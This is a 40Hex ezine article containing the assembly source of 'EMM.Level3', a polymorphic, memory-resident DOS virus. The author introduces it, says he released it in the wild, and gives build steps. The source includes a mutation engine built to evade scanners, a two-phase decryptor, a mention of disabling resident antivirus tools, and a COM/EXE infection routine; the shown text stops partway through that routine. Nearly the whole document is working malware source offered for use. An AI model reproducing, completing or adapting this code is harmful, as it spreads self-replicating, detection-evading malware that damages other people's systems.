Copy Link
Add to Bookmark
Report

40Hex Issue 14 File 010

eZine's profile picture
Published in 
40Hex
 · 3 months ago

40Hex Number 14 Volume 5 Issue 1                                      File 010 

comment %

Dear Virus Friends,

dis is so far my latest production.
It is a polymorphic virus that uses some stealth techniques.
After execution of infected file, it goes memory-resident and hits com'n'exe
on execution or creation.
There are two interesting features to this.
First it is the polymorphic engine that generates two-phase decrypting routine.
First phase consists of various instructions, among them some decrypt phase two.
Phase two is a regular cyclical decryptor. (By altering phase two you probably
can avoid detection by the virus scanners.)
Second feature is demobilising of resident virus utilities (see source code
of function "eliminate_av" for further details).
Well, after I planted this virus in the field, I was told it does not run
on 486s. The problem is that prefetch queue is longer on 486 than on my home
machine and that's why self modyfying code does not work. Well, sorry for
that, I really didn't mean to.
To correct this problem, follow the instructions in the source code
marked by "#####".
To get a working copy of original EMM.Level3 virus do the following:
tasm level3.asm (I used ver. 2.51; do not use /M switch)
tlink level3.obj (I used ver. 4.00)
level3.exe

Btw, I am Vyvojar, and you may have met Explosion and One Half - the forerunners
to Level3.

(pre SVL: na stretnutie sa tesim :)) - len neviem ako sa skontaktujeme ...
skuste sa na mna spytat na irc - kanal #virus)

%

.model small
.stack 80h

host_segment segment
mov ax,4c00h
int 21h
host_segment ends

virus_segment segment
assume cs:virus_segment,ds:virus_segment

start_virus label near

DEPTH=5*3
sstack db DEPTH dup(?)
ssp dw DEPTH ;stack simulation

LENOVER=DEPTH ;length of overwritable bytes
LENVIR=(offset end_virus-offset start_virus)
LENHBUF=700 ;length of header buffer (for phase 1)
EXTENTION=(16+LENVIR+LENHBUF) ;by this number infected file grows
DEPSTACK=80h
LENFNB=64 ;length of file name buffer
LENDEC=(edec-sdec) ;decoder length (phase 2)
MEMPOS=04fbh ;memory location for far jump within segment 0000h
ORDER=25

strc struc ;structure for exe header
id dw ?
lpage dw ?
pages dw ?
items dw ?
parps dw ?
min dw ?
max dw ?
vSS dw ?
vSP dw ?
flag db ? ;com/exe determination
db ?
vIP dw ?
vCS dw ?
strc ends

bheader strc <1,,,,,,,0,,1,,0,0>

v16 dw 16
v30 dw 30
v512 dw 512

;********************** Explosion's Mutation Machine *********************

db '* EMM 1.0 *'
rnd_get:
push si
push ax
push bx
push cx
push dx
db 0b9h
rnd2 dw ?
db 0bbh
rnd1 dw ?
mov dx,015ah
mov ax,4e35h
xchg ax,si
xchg ax,dx
test ax,ax
jz rnd_l1
mul bx
rnd_l1: jcxz rnd_l2
xchg ax,cx
mul si
add ax,cx
rnd_l2: xchg ax,si
mul bx
add dx,si
inc ax
adc dx,0000h
mov cs:rnd1,ax
mov cs:rnd2,dx
mov ax,dx
pop cx
xor dx,dx
jcxz rdbz ;division by zero
div cx
jmp short danilak_vyskumnik
rdbz: xchg dx,ax ;if dx=0 on input then interval 0-ffff
danilak_vyskumnik:
pop cx
pop bx
pop ax
pop si
retn

registers label near ;flag,value,offset when w=0 (operation with byte)
rax db 3 dup(?),(offset rax-offset registers)
rcx db 3 dup(?),(offset rcx-offset registers)
rdx db 3 dup(?),(offset rdx-offset registers)
rbx db 3 dup(?),(offset rbx-offset registers)
rsp db 3 dup(?),(offset rax-offset registers)
rbp db 3 dup(?),(offset rcx-offset registers)
rsi db 3 dup(?),(offset rdx-offset registers)
rdi db 3 dup(?),(offset rbx-offset registers)
res db 4 dup(?)
rflag db 4 dup(?)

;bits in flag:
; 0 = lo part of register set if 1
; 1 = hi part of register set if 1
; 2 = don't change value of register if 1 (for sp)

fw db ? ;fw=0 when byte operation, fw=1 when word operation

choose:
push ax ;selection of routine according to the table
push cx ;ds:si points to the table
push dx ;table is in the format: byte/probability
push si ; word/adr of routine
xor cx,cx ;table ends with 0ffh
take_next: lodsb
cbw
add cx,ax
cmp al,0ffh
lodsw
jne take_next
inc cx ;subtract 0ffffh
pop si
mov dx,cx
call rnd_get
try_next: lodsb
cbw
sub cx,ax
lodsw
cmp dx,cx
jb try_next
xchg si,ax
pop dx
pop cx
pop ax
jmp si ;jump to the selected routine

getaddr: ;get addr of reg within registers table
push ax
push bx
mov si,dx
shl si,1
shl si,1
mov bx,offset registers
add si,bx
mov ch,3 ;mask for word register
cmp fw,0
jne chsl
add si,3
lodsb
cbw
xchg si,ax
add si,bx
dec ch ;mask for hi byte of reg
test dl,04h
jnz chsl
dec ch ;mask for lo byte of reg
chsl: pop bx
pop ax
retn

gregl: ;select target reg (output in dx)
push cx
push si
gregl_other: mov dx,8
call rnd_get
call getaddr
test byte ptr [si],04h ;can I modify value of reg?
jnz gregl_other
pop si
pop cx
retn

gregp: ;select source reg with defined value (output in dx)
push ax
xor ah,ah
jmp short kazisvet_prefikany
gregls: ;select target reg with defined value (output in dx)
push ax
gl108: mov ah,04h
kazisvet_prefikany:
push cx
push si
push bp
mov dx,8
call rnd_get
mov bp,dx
xor dx,dx
mov cl,dl
grdl1: call getaddr
lodsb
test al,ah
jnz grng1
and al,03h
cmp al,03h
je vrah_pocitacovy_kosicky
cmp al,ch
jne grng1
vrah_pocitacovy_kosicky:
inc cx
dec bp
js tulen_bacil
grng1: inc dx
cmp dx,8
jb grdl1
or cl,cl
jnz gra1v
stc
jmp short grnv
gra1v: and dx,07h
jmp grdl1
tulen_bacil: clc
grnv: pop bp
pop si
pop cx
pop ax
retn

wtreg: ;write value into reg
push cx
push si
call getaddr
inc si
cmp ch,3
jne wtw1
mov [si],ax
jmp short wtb1
wtw1: cmp ch,1
je panko_revizor
inc si
panko_revizor: mov [si],al
wtb1: pop si
pop cx
retn

rfreg: ;read value from reg
push cx
push si
call getaddr
inc si
cmp ch,3
jne rfw1
lodsw
jmp short rfb1
rfw1: cmp ch,1
je rfnp
inc si
rfnp: lodsb
rfb1: pop si
pop cx
retn

shl3fw:
or al,fw
shl3dl:
push dx
mov cl,3
shl dl,cl
or ah,dl
pop dx
retn

;************************* generating of MOV *********************

;generating of mov reg,imm
mt1:
call gregl
push dx
mov al,fw
mov cl,3
shl al,cl
or al,10110000b
or al,dl
stosb
xor dx,dx
call rnd_get
xchg ax,dx
pop dx
call wtreg
call getaddr
or [si],ch
cmp ch,3
jne bt1
stosw
jmp wd1
bt1: stosb
wd1: retn

;generating of mov reg,reg
mt2:
call gregp
jc wd1
call rfreg
push ax
mov ax,1100000010001010b
or al,fw
or ah,dl
mov bx,dx
nti1: call gregl
cmp bx,dx
je nti1
call shl3dl
stosw
pop ax
call wtreg
call getaddr
or [si],ch
retn

chtab00 db 45
dw offset mt1
db 45
dw offset mt2
db 3
dw offset mt6
db 3
dw offset mt7
db 1
dw offset mt3
db 1
dw offset mt4
db 1
dw offset mt5
db 0ffh
gmovr:
mov si,offset chtab00
jmp choose

;generating of mov ds,reg
mt5:
mov fw,1
test res+3,1
jnz mt5err ;if ds is set to cs, do nothing
call gregp
jc mt5err
mov ax,1101100010001110b
or ah,dl
stosw
mt5err: retn

;generating of mov reg,sreg
mt4:
mov fw,1
mov dx,20h
call rnd_get
mov ax,1100000010001100b
or ah,dl
and ah,0f8h
call gregl
or ah,dl
stosw
call getaddr
and ah,00011000b
jz sppse
and byte ptr [si],0fch ;value in reg is not valid
retn
sppse: mov al,res
mov [si],al
mov ax,word ptr res+1
mov [si+1],ax
retn

;generating of mov es,reg
mt3:
mov fw,1
call gregp
jc mt3err
mov ax,1100000010001110b
or ah,dl
stosw
call rfreg
or res,3
mov word ptr res+1,ax
mt3err: retn

;generating of xor X,X
mt6:
mov al,00110010b
jmp short com67

;generating of sub X,X
mt7:
mov al,00101010b
com67: mov ah,11000000b
call gregl
or ah,dl
call getaddr
or [si],ch ;reg is set to zero and has valid value
mov word ptr ds:(offset gl102),0c032h
jmp short pcpm67

;******************** general part for OR, AND, ... ************************

perform_oper_l2:
mov al,fw
add byte ptr ds:(offset gl102),al
call rfreg
mov bp,word ptr rflag+1
push bp
popf
sti
cld
gl102: or al,bl
pushf
pop bp
mov word ptr rflag+1,bp
jmp wtreg

perform_oper_l1:
call perform_oper_l2
or rflag,1
retn

chtab01 db 45
dw offset ot1
db 45
dw offset ot2
db 10
dw offset ot3
db 0ffh
ggen2:
lodsb
mov ah,0c3h
mov word ptr ds:(offset gl102),ax
lodsb
mov byte ptr ds:(offset gl104+1),al
lodsb
mov ah,11000000b
mov word ptr ds:(offset gl105+1),ax
lodsw
mov word ptr ds:(offset gl106+1),ax
mov si,offset chtab01
jmp choose

;generating of ins a?,imm
ot3:
xor dx,dx
call getaddr
lodsb
and al,03h
cmp al,03h
je ot3obn
cmp al,ch
jne ot1
ot3obn: push dx
gl104: mov al,00001100b
or al,fw
stosb
jmp short tozti

;generating of ins reg,reg
ot2:
call gregp
jc wdort1
call rfreg
xchg bx,ax
gl105: mov ax,1100000000001010b
or ah,dl
call gregls
jc wdort1
pcpm67: call shl3fw
stosw
jmp perform_oper_l1

;generating of ins reg,imm
ot1:
call gregls
jc wdort1
push dx
gl106: mov ax,1100100010000000b
or al,fw
or ah,dl
stosw
tozti: xor dx,dx
call rnd_get
mov bx,dx
pop dx
call perform_oper_l1
xchg ax,bx
cmp fw,0
je bort1
stosw
jmp wdort1
bort1: stosb
wdort1: retn

;*********************** generating of OR ***************************
orrdat db 0ah ;oper AL,BL ... inc ... oper AX,BX
db 00001100b ;oper a?,imm
db 00001010b ;oper reg,reg
dw 1100100010000000b ;oper reg,imm
gorr:
mov si,offset orrdat
pgen21: jmp ggen2
;*********************** generating of AND ***************************
andrdat db 22h ;oper AL,BL ... inc ... oper AX,BX
db 00100100b ;oper a?,imm
db 00100010b ;oper reg,reg
dw 1110000010000000b ;oper reg,imm
gandr:
mov si,offset andrdat
jmp pgen21
;*********************** generating of XOR ***************************
xorrdat db 32h ;oper AL,BL ... inc ... oper AX,BX
db 00110100b ;oper a?,imm
db 00110010b ;oper reg,reg
dw 1111000010000000b ;oper reg,imm
gxorr:
mov si,offset xorrdat
pggen2: jmp pgen21
;*********************** generating of TEST **************************
testrdt db 84h ;oper AL,BL ... inc ... oper AX,BX
db 10101000b ;oper a?,imm
db 10000100b ;oper reg,reg
dw 1100000011110110b ;oper reg,imm
gtestr:
mov si,offset testrdt
ggen3: mov byte ptr ds:(offset gl108+1),00h ;target register can be any register set to proper value
call ggen2
mov byte ptr ds:(offset gl108+1),04h ;restore
retn
;*********************** generating of CMP ***************************
cmprdat db 3ah ;oper AL,BL ... inc ... oper AX,BX
db 00111100b ;oper a?,imm
db 00111010b ;oper reg,reg
dw 1111100010000000b ;oper reg,imm
gcmpr:
mov si,offset cmprdat
jmp ggen3
;*********************** generating of ADD ***************************
addrdat db 02h ;oper AL,BL ... inc ... oper AX,BX
db 00000100b ;oper a?,imm
db 00000010b ;oper reg,reg
dw 1100000010000000b ;oper reg,imm
gaddr:
mov si,offset addrdat
jmp pggen2
;*********************** generating of SUB ***************************
subrdat db 2ah ;oper AL,BL ... inc ... oper AX,BX
db 00101100b ;oper a?,imm
db 00101010b ;oper reg,reg
dw 1110100010000000b ;oper reg,imm
gsubr:
mov si,offset subrdat
jmp pggen2
;*********************** generating of ADC ***************************
adcrdat db 12h ;oper AL,BL ... inc ... oper AX,BX
db 00010100b ;oper a?,imm
db 00010010b ;oper reg,reg
dw 1101000010000000b ;oper reg,imm
gadcr:
mov si,offset adcrdat
ggen4: test rflag,1
jnz pggen2
gg10err: retn
;*********************** generating of SBB ***************************
sbbrdat db 1ah ;oper AL,BL ... inc ... oper AX,BX
db 00011100b ;oper a?,imm
db 00011010b ;oper reg,reg
dw 1101100010000000b ;oper reg,imm
gsbbr:
mov si,offset sbbrdat
jmp ggen4

;***************** general part for INC,DEC,... ******************

chtab03 db 1
dw offset inct2
chtab04 db 1
dw offset inct1
db 0ffh
ggen11:
lodsw
mov word ptr ds:(offset gl102),ax
lodsw
mov word ptr ds:(offset gl201+1),ax
lodsb
mov byte ptr ds:(offset gl202+1),al
gl203: mov si,offset chtab03
jmp choose

;generating of ins reg8 or ins reg16 (2 bytes)
inct1:
call gregls
jc gg10err
gl201: mov ax,1100000011111110b
ggen21: or al,fw
or ah,dl
stosw
jmp perform_oper_l2

;generating of ins reg16 (1 byte)
inct2:
mov fw,1
call gregls
jc gg10err
gl202: mov al,01000000b
or al,dl
stosb
jmp perform_oper_l2

;*********************** generating of INC ***************************
incrdat dw 0c0feh ;operation
dw 1100000011111110b ;2 bytes
db 01000000b ;1 byte
gincr:
mov si,offset incrdat
jmp ggen11
;*********************** generating of DEC ***************************
decrdat dw 0c8feh ;operation
dw 1100100011111110b ;2 bytes
db 01001000b ;1 byte
gdecr:
mov si,offset decrdat
jmp ggen11
;*********************** generating of NEG ***************************
negrdat dw 0d8f6h ;operation
dw 1101100011110110b ;2 bytes
gnegr:
mov si,offset negrdat
push di
call ggen12
pop ax
cmp di,ax ;if no operation performed then no flags set
jna inegbv
or rflag,1
inegbv: retn
;*********************** generating of NOT ***************************
notrdat dw 0d0f6h ;operation
dw 1101000011110110b ;2 bytes
gnotr:
mov si,offset notrdat
ggen12: mov word ptr ds:(offset gl203+1),offset chtab04
call ggen11
mov word ptr ds:(offset gl203+1),offset chtab03
xt1err: retn

;*********************** generating of XCHG **************************

chtab05 db 1
dw offset xchgt1
db 1
dw offset xchgt2
db 0ffh
gxchgr:
mov si,offset chtab05
jmp choose

;generating of xchg reg,reg (2 bytes)
xchgt1:
call gregls ;source operand
jc xt1err
call rfreg
xchg bx,ax
mov ax,1100000010000110b
or ah,dl
mov bp,dx
call gregls ;target operand
cmp bp,dx
je xt1err
push bp
call shl3fw
stosw
gl301: call rfreg
xchg ax,bx
call wtreg
pop dx
xchg ax,bx
jmp wtreg

;generating of xchg ax,reg (1 byte)
xchgt2:
mov fw,1
call gregls
jc xt1err
cmp rax,03h
jne xt1err
call rfreg
xchg bx,ax
mov al,10010000b
or al,dl
push dx
xor dx,dx ;target operand
stosb
jmp gl301

;***************** general part for SHL,SHR,... ******************

ggen20:
mov al,11010000b
test rcx,1 ;valid value in cl ?
jz rbsh1
mov dx,2
call rnd_get ;shl ,cl or shl ,1 ?
shl dl,1
or al,dl
mov cl,rcx+1
rbsh1: mov word ptr ds:(offset gl102),ax
call gregls
jc gg20err
and rflag,0feh ;flags not defined
jmp ggen21

;********************* generating of SHL,SAL *************************
gshlr:
mov ah,11100000b
jmp ggen20
;*********************** generating of SHR ***************************
gshrr:
mov ah,11101000b
jmp ggen20
;*********************** generating of SAR ***************************
gsarr:
mov ah,11111000b
jmp ggen20
;*********************** generating of ROL ***************************
grolr:
mov ah,11000000b
jmp ggen20
;*********************** generating of ROR ***************************
grorr:
mov ah,11001000b
jmp ggen20
;*********************** generating of RCL ***************************
grclr:
mov ah,11010000b
ggen22: test rflag,1
jz gg20err
jmp ggen20
gg20err: retn
;*********************** generating of RCR ***************************
grcrr:
mov ah,11011000b
jmp ggen22

;*********************** generating of PUSH **************************

chtab06 db 15
dw offset gpt1
db 3
dw offset gpt2
db 1
dw offset gpt3
db 0ffh
gpushr:
cmp ssp,0
je gg20err ;emulated stack full
mov si,offset chtab06
gl410: mov fw,1
jmp choose

;type: push reg
gpt1:
call gregl ;can push any reg (except sp)
mov al,01010000b
or al,dl
stosb
call getaddr
lodsb
xchg cx,ax
call rfreg

;-------- simulation of PUSH --------
spush:
sub ssp,3
sub word ptr rsp+1,2
mov si,ssp
mov byte ptr [si+offset sstack],cl
mov word ptr [si+offset sstack+1],ax
retn

;type: push sreg
gpt2:
mov dx,00100000b
call rnd_get
xchg ax,dx
or al,00000110b
and al,11111110b
gl409: stosb
xor cl,cl
cmp al,00000110b
jne spush
mov ax,word ptr res+1
mov cl,res ;if it is es
jmp spush

;type: pushf
gpt3:
mov al,10011100b
jmp gl409

;*********************** generating of POP ***************************

chtab07 db 15
dw offset gpot1
db 2
dw offset gpot2
db 1
dw offset gpot3
db 3
dw offset gpot4
db 0ffh
gpopr:
cmp ssp,DEPTH
je gg20err ;emulated stack is empty
mov si,offset chtab07
jmp gl410

;type: pop reg
gpot1:
call gregl ;can pop any reg (except sp)
mov al,01011000b
or al,dl
stosb
call spop
call getaddr
mov byte ptr [si],cl
call wtreg
retn

;-------- simulation of POP --------
spop:
mov si,ssp
mov cl,byte ptr [si+offset sstack]
mov ax,word ptr [si+offset sstack+1]
add ssp,3
add word ptr rsp+1,2
retn

;type: pop es
gpot2:
mov al,00000111b
stosb
call spop
mov res,cl
mov word ptr res+1,ax
chpote: retn

;type: pop ds
gpot3:
test res+3,1
jnz chpote ;if ds set to cs do nothing
mov al,00011111b
stosb
jmp spop

;type: push cs,pop ds
gpot4:
test res+3,1
jnz chpote
mov ax,0001111100001110b
stosw
or res+3,1 ;note that ds is set
retn

;********************* generating of jumps **************************

MAXJMP=20
gbytes:
push ax
push cx
push dx
mov cx,dx
jcxz gbsdda
gbdb: xor dx,dx
call rnd_get
xchg ax,dx
stosb
loop gbdb
gbsdda: pop dx
pop cx
pop ax
retn
takeb:
call rnd_get
add si,dx
lodsb
retn

NOJCON=17
jcontab db 01110111b ;ja/jnbe
db 01110011b ;jae/jnb/jnc
db 01110010b ;jb/jnae/jc
db 01110110b ;jbe/jna
db 01110100b ;je/jz
db 01111111b ;jg/jnle
db 01111101b ;jge/jnl
db 01111100b ;jl/jnge
db 01111110b ;jle/jng
db 11101011b ;jmp
db 01110101b ;jne/jnz
db 01110001b ;jno
db 01111011b ;jnp/jpo
db 01111001b ;jns
db 01110000b ;jo
db 01111010b ;jp/jpe
db 01111000b ;js
jcxdtab db 11100011b ;jcxz
db 11100010b ;loop
db 11100001b ;loope/loopz
db 11100000b ;loopne/loopnz

chtab09 db 24
dw offset gjcon
db 5
dw offset gjcxd
db 1
dw offset gjmpn
db 3
dw offset gcall
db 0ffh
gjmp:
mov si,offset chtab09
jmp choose

;generating of jx
gjcon:
test rflag,1
jz g40err
mov si,offset jcontab
mov dx,NOJCON
ggen41: call takeb
stosb
mov byte ptr ds:(offset gl501),al
mov cx,word ptr rcx+1
mov bp,word ptr rflag+1
push bp
popf

;#####
;to run on 486 supply this:
; jmp $+2
;#####

gl501: jmp short gl502
xor dx,dx
call rnd_get
xchg ax,dx
stosb
jmp short g40mcx
gl502: mov dx,MAXJMP ;max no of bytes to jump over
call rnd_get
mov al,dl
stosb
call gbytes
g40mcx: mov word ptr rcx+1,cx
g40err: retn

;generating of jcxz,loopx
gjcxd:
cmp rcx,3
jne g40err
mov si,offset jcxdtab
mov dx,2
test rflag,1
jz ggen41
mov dx,4
jmp ggen41

;generating of jmp near
gjmpn:
mov al,11101001b
stosb
mov dx,MAXJMP
call rnd_get
mov ax,dx
stosw
jmp gbytes

;generating of call X
gcall:
test byte ptr eflag,4
jz g40err ;can't generate call if no retn before
mov al,11101000b
stosb
mov ax,retnaddr
dec ax
dec ax
sub ax,di
stosw
retn

;****************** generating of sti,cli,std,cld **********************

sacftb label byte
sti
cli
std
cld
gsacf:
mov si,offset sacftb
mov dx,4
call takeb
stosb
retn

;********************* generating of mem. ins. *************************

chtab10 db 4
dw offset pissi
db 4
dw offset pisdi
db 4
dw offset pisbx
db 1
dw offset pisbr
db 0ffh
g2ndb:
mov si,offset chtab10
jmp choose
pissi: mov bp,word ptr rsi+1
mov ah,10000100b
cmp rsi,3
je chenbr
pisdi: mov bp,word ptr rdi+1
mov ah,10000101b
cmp rdi,3
je chenbr
pisbx: mov bp,word ptr rbx+1
mov ah,10000111b
cmp rbx,3
je chenbr
pisbr: xor bp,bp
mov ah,00000110b
chenbr: retn

insertcs:
test res+3,1 ;ds set to cs ?
jnz jtdss
mov byte ptr [di],2eh ;insert cs: prefix
inc di
jtdss: retn

ggen60: call gregp
jc gmerr
push ax
call rfreg
or al,al
pop ax
jz gmerr ;to avoid operation with 0
call shl3dl
ggen61: or al,fw
call insertcs
stosw
mov si,ptei
mov word ptr [si],ax
call rfreg
mov word ptr [si+4],ax
mov dx,LENDEC
sub dl,fw ;to enable proper rotation
call rnd_get
mov word ptr [si+2],dx
add ptei,6
mov ax,sodec
add ax,dx
sub ax,bp
stosw
and rflag,0feh ;flags modified
gmerr: retn

chtb20o db 6,8,8,2,2 ;starting probabilities for memory-modifying instructions
chtab20 db ?
dw offset gxorp
db ?
dw offset gaddp
db ?
dw offset gsubp
db ?
dw offset grolp
db ?
dw offset grorp
db 0ffh
gmutp:
cmp ptei,offset eei
jnb gmerr
call g2ndb
mov si,offset chtab20
jmp choose
gxorp:
mov al,00110000b
jmp ggen60
gaddp:
mov al,00000000b
jmp ggen60
gsubp:
mov al,00101000b
jmp ggen60
grolp:
mov al,11010000b
mov dx,4
call rnd_get
or dx,dx
jz zbclns
test rcx,1 ;cl set ?
jz zbclns
cmp rcx+1,0
je zbclns ;does not generate rotation ,cl if cl=0
or al,00000010b
zbclns: mov dx,1 ;address for emulated cx
jmp ggen61
grorp:
or ah,00001000b
jmp grolp

;********************* generating of mem. mov **************************

chtab30 db 5
dw offset pmvt1
db 1
dw offset pmvt2
db 0ffh
gmovp:
call g2ndb
mov si,offset chtab30
jmp choose

;type: mov reg,mem
pmvt1:
call gregl
mov al,10001010b
call shl3fw
push dx
call insertcs
stosw
mov dx,di
sub dx,offset hbuf+1
call rnd_get ;in dx offset within header buffer
mov ax,rel
add ax,dx
sub ax,bp
stosw
xchg ax,dx
pop dx
call getaddr
or [si],ch ;reg value is valid
mov si,offset hbuf
add si,ax
lodsw
jmp wtreg ;read byte and write to reg

;type: mov mem,reg
pmvt2:
call gregp
jc pmverr
mov al,10001000b
call shl3fw
call insertcs
stosw
mov dx,LENOVER-1
call rnd_get ;in dx offset within overwritable bytes
mov ax,gba
add ax,dx
sub ax,bp
stosw
pmverr: retn

chtabgl db 13
dw offset gjmp
db 32
dw offset gmutp
db 17
dw offset gmovp
chtabg1 db 70
dw offset gmovr
db 1
dw offset gsacf
db 16
dw offset gpushr
db 16
dw offset gpopr
db 4
dw offset gshlr
db 4
dw offset gshrr
db 2
dw offset gsarr
db 2
dw offset grolr
db 2
dw offset grorr
db 2
dw offset grclr
db 2
dw offset grcrr
db 7
dw offset gorr
db 7
dw offset gandr
db 4
dw offset gxorr
db 4
dw offset gtestr
db 9
dw offset gaddr
db 9
dw offset gsubr
db 2
dw offset gadcr
db 2
dw offset gsbbr
db 4
dw offset gcmpr
db 4
dw offset gincr
db 4
dw offset gdecr
db 4
dw offset gxchgr
db 2
dw offset gnegr
db 2
dw offset gnotr
db 0ffh

EMM:
cld
mov cx,10
mov di,offset registers
xor ax,ax
li1: stosb ;initialize variables
add di,3
loop li1
xchg bx,ax ;bx=0
mov al,eflag
and al,01h
mov res+3,al ;if al=1 ds is set, if al=0 ds is not set
mov al,04h
test byte ptr eflag,2
jz nsspj
or al,03h
nsspj: or rsp,al ;don't change sp , known value of sp on input
mov ssp,DEPTH ;initialize ssp
mov ptei,offset ei ;initialize ptei
neprkm: mov cx,5
mov si,offset chtb20o
mov di,offset chtab20
sprpm: lodsb
cbw
xchg dx,ax
call rnd_get
xchg ax,dx
add bx,ax
stosb
inc di
inc di
loop sprpm ;setting of probabilities for memory-modifying instructions
or bx,bx
jz neprkm ;not accepted setting of the probabilities
mov di,offset hbuf
mov ax,-1
push ax
test byte ptr eflag,4 ;generate intro garbage bytes ?
jz ngenuv
pop ax
MAXINTRO=100
mov dx,MAXINTRO-1
call rnd_get
inc dx ;in dx length of intro in bytes
push dx
push dx
call rnd_get
call gbytes ;write down random bytes
mov retnaddr,di ;address of retn instruction
mov al,11000011b
stosb ;write retn
pop ax
sub ax,dx
xchg dx,ax
call gbytes ;random bytes
ngenuv: mov ax,di
sub ax,offset hbuf
add ax,rel
mov hip,ax ;ip value for the file
MINHDR=400 ;minimal header length
mov dx,LENHBUF-LENDEC-MINHDR+1
pop ax ;in ax length of intro-1
sub dx,ax
call rnd_get
add dx,ax
add dx,MINHDR ;in dx start of decoder
;relatively to start of hbuf, i.e. header length
mov hend,dx
add hend,offset hbuf ;relocation relat. to start of buffer
add dx,rel
mov sodec,dx ;start of decoder within the file
mov word ptr ds:(offset chchtb+1),offset chtabgl ;use all instructions
mov byte ptr ds:(offset sj1+1),0 ;setting of the switched jump
next_inst:
push di
mov dx,3
call rnd_get
or dl,dl
jz ginsh
mov dl,1
ginsh: mov fw,dl ;byte or word inst.
chchtb: mov si,offset chtabgl
call choose ;generating of inst.
pop ax
sj1: jmp short gc1
gc1: push di

;#####
;to run on 486 change the following instruction
;which goes: add di,MAXJMP+3-1
;into: add di,40 ;prefetch queue is 32B for 486
;#####

add di,MAXJMP+3-1
cmp di,hend
pop di
jb next_inst
mov word ptr ds:(offset chchtb+1),offset chtabg1 ;do not generate mem-modifying ins.
mov byte ptr ds:(offset sj1+1),offset gc2-offset gc1 ;switch of jump
jmp next_inst
gc2: cmp di,hend
jb next_inst
xchg di,ax
jne next_inst ;if not end of header then repeat
xchg di,ax
mov bx,di
mov ax,offset stsub+(hbuf-start_virus)-LENVIR-(dcjmp-sdec)-2
sub ax,di
mov dcjmp,ax ;setting the jump in decoder
mov si,offset sdec
mov cx,LENDEC
rep movsb ;copy decoder behind header
mov si,ptei
udzd: cmp si,offset ei
jna vsmu
sub si,6 ;reading of mem-modif. inst. in reverse order
mov al,byte ptr [si]
mov dl,al
and dl,11111100b
cmp dl,00000000b
jne zop1
or al,00101000b
zop1: cmp dl,00101000b
jne zop2
and al,00000011b
zop2: mov ah,10001111b
and word ptr [si],0011100011111100b
cmp word ptr [si],0000100011010000b
jne njtsp
and ah,11000111b ;xchange ADD for SUB, ROL for ROR and vice versa
njtsp: mov word ptr ds:(offset vari),ax
mov dx,word ptr [si+2]
mov word ptr ds:(offset vari+2),dx
mov cx,word ptr [si+4]
jmp $+2
vari: xor [bx+1234h],cx ;perform reverse operation on decoder
jmp udzd
vsmu: retn

;******************* decoder ****************

sdec:
sti
push cs
pop ds
dcmsi: mov si,1234h
dcmax: mov ax,1234h
mov cx,(LENVIR-1)/2+1
dp2: xor [si],ax
jmp short dcaax1
dcaax2: add ax,1234h
inc si
loop dp2
db 0e9h
dcjmp dw ?
dcaax1: add ax,1234h
inc si
xor [si],ax
jmp dcaax2

edec label near

;******************** Explosion's Mutation Machine ********************

;*************** copied routines **************

zencode:
mov cx,LENVIR
xor dx,dx ;offset start_virus
call zzp1
mov ah,40h
mov bx,handle
pushf
db 9ah
dd ? ;call ds:oriv21
jc zec1
cmp ax,cx
zec1: pushf
call zzp1
popf
retn
zzp1: push cx
mov si,dx
zecmax: mov ax,1234h
mov cx,(LENVIR-1)/2+1
zzp2: xor [si],ax
zecaax1: add ax,1234h
inc si
xor [si],ax
zecaax2: add ax,1234h
inc si
loop zzp2
pop cx
retn

zres24:
mov al,03h
iret

zenden label near

;************** routines for res. part *************

set_on_24:
push dx
push ds
push cs
pop ds
mov ax,3524h
call int21
mov seg24,es
mov off24,bx
mov ax,2524h
mov dx,offset res24
call int21
pop ds
pop dx
retn

set_off_24:
mov ax,2524h
lds dx,dword ptr cs:off24
call int21
retn

identify: ;is file infected ?
push dx
mov ax,es:[bx+2]
inc ax
xor dx,dx
div cs:v30
mov ax,es:[bx]
and al,11111b
cmp al,dl
stc
je iekon ;already infected
mov ax,es:[bx]
and ax,0ffe0h
or al,dl
clc
iekon: pop dx
retn

;*********** infect EXE,COM ***********

write_file:
mov ah,40h
jmp short s1
read_file:
mov ah,3fh
s1: call s2
jc s3
cmp ax,cx
s3: retn
start_file:
xor cx,cx
mov dx,cx
pos_start:
mov ax,4200h
jmp short s2
end_file:
xor cx,cx
mov dx,cx
pos_end:
mov ax,4202h
mhandle:
s2: mov bx,cs:handle
int21:
pushf
cli
call cs:oriv21
retn

infect:
mov ax,5700h
call mhandle
mov bx,offset ftime
mov [bx],cx
mov [bx+2],dx ;read in time and date of last write
call identify
jnc ienjnp
igbck: retn

ienjnp: xor dx,dx
call rnd_get
mov word ptr ds:(offset dcmax+1),dx
mov word ptr ds:(offset ecmax+1),dx
xor dx,dx
call rnd_get
mov word ptr ds:(offset dcaax1+1),dx
mov word ptr ds:(offset ecaax1+1),dx
xor dx,dx
call rnd_get
mov word ptr ds:(offset dcaax2+1),dx
mov word ptr ds:(offset ecaax2+1),dx ;values for encoding

call start_file
mov cx,18h
mov dx,offset header
call read_file
pigbck: jc igbck
mov si,dx
mov di,offset bheader
rep movsb
push dx
call end_file
mov lenlo,ax
mov lenhi,dx
mov si,ax
mov di,dx
pop bx
cmp [bx].id,'MZ'
je iEXE1
cmp [bx].id,'ZM'
je iEXE1
mov bheader.flag,0 ;0 means COM
cmp ax,65535-(EXTENTION+DEPSTACK) ;much too long ?
ja igbck
mov bheader.min,0000h ;min. memory is 0
jmp short iCOM1
iEXE1: mov bheader.flag,1
mov ax,[bx].pages
mul v512
sub ax,si
sbb dx,di
jc pigbck ;overlay detected
mov ax,si
mov dx,di
add ax,EXTENTION
adc dx,0
div v512
or dx,dx
jz spcp1 ;special case is that dx=0
inc ax
spcp1: mov [bx].pages,ax
mov [bx].lpage,dx ;setting pages and bytes in last page
iCOM1: and si,0fff0h
add si,16
adc di,0
mov dx,si
mov cx,di
push bx
call pos_start ;allignment to the multiply of 16
pop bx
cmp bheader.flag,0
jne iEXE2
mov byte ptr [bx],0e9h ;getting ready for jump
add ax,100h
mov gba,ax
add ax,LENVIR
mov rel,ax
mov eflag,001b ;setting parameters for EMM
jmp short iCOM2
iEXE2: mov ax,[bx].parps
mul v16
sub si,ax
sbb di,dx
mov ax,si
mov dx,di
div v16
mov [bx].vCS,ax
mov bheader.id,ax ;store org cs
mov ax,[bx].vSS
mul v16
mov cx,[bx].vSP
add ax,cx
adc dx,0
sub ax,si
sbb dx,di
jc zjvs
sub ax,DEPSTACK
sbb dx,0
jc pikon1
add [bx].vSS,(EXTENTION-1)/16
zjvs: mov rel,LENVIR
mov gba,0
